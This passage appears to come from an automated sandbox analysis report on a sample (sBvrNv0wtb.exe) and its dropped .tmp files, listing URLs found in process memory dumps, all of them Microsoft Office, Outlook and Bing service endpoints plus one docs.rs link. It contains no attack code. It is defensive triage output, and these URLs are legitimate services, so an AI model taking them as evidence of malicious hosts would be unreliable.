    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesx
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designerapp.officeapps.live.com/designerapp4A-41F5A7235243
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1665092686.00000248C2B0D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2016612588.00000248C2D7B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059927373.00000248C2D7D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013229601.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designerappservice.officeapps.live.com
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.cortana.aiBearer
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.cortana.aihttps://login.windows.net/common/oauth2/authorize
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint//rest
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/testBR
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430359257.0000000005666000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392259764.00000000056A2000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053127939.00000248C31E1000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015894412.00000248C31DA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://directory.services.
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://directory.services.live.com/profile/Profile.asmx.asmxCQ
    Source: sBvrNv0wtb.exe, 00000000.00000003.1313913322.000001972756D000.00000004.00000020.00020000.00000000.sdmp, sBvrNv0wtb.exe, 00000000.00000003.1347329405.000001972797A000.00000004.00000020.00020000.00000000.sdmp, 918D.tmp, 00000004.00000000.1346823200.00007FF7A9234000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
    Source: 872C.tmp, 00000003.00000003.1389030539.0000000003CF3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388768349.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388768349.0000000003CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecs.nel.measure.office.net/api/report?TenantId=Office&DestinationEndpoint=Edge-Prod-EWR30r4c
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v1/DesignerPM6g5
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v1/Designertionag
    Source: 872C.tmp, 00000003.00000003.1388768349.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389143678.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394889765.0000000001DEF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388768349.0000000003CAB000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1432006478.0000000001DEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v2/Office/officeclicktorun/16.0.18526.20168/Production/CC?&EcsCanary=1
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://ecs.office.com/config/v2/OfficeetagPerpetualLicenseLicenseCategoryArchitectureSubscriptionLi
    Source: 872C.tmp, 00000003.00000003.1388768349.0000000003CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com:443/config/v2/Office/officeclicktorun/16.0.18526.20168/Production/CC?&EcsCana
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013075406.00000248C2C06000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055774494.00000248C2C5F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059122796.00000248C2C5F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2047270961.00000248C2C5B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015326352.00000248C2C4C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v11T
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1AuthorizationBearer
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1_
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059765755.00000248C2D40000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055975744.00000248C2D3C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055272677.00000248C2D3C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1AuthorizationBearer
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1OT
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060694156.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040240300.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1bledE
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1ed.
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059765755.00000248C2D40000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055975744.00000248C2D3C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055272677.00000248C2D3C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1EnrichmentWACUrlhttps://enrichment.osi.
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1mTO
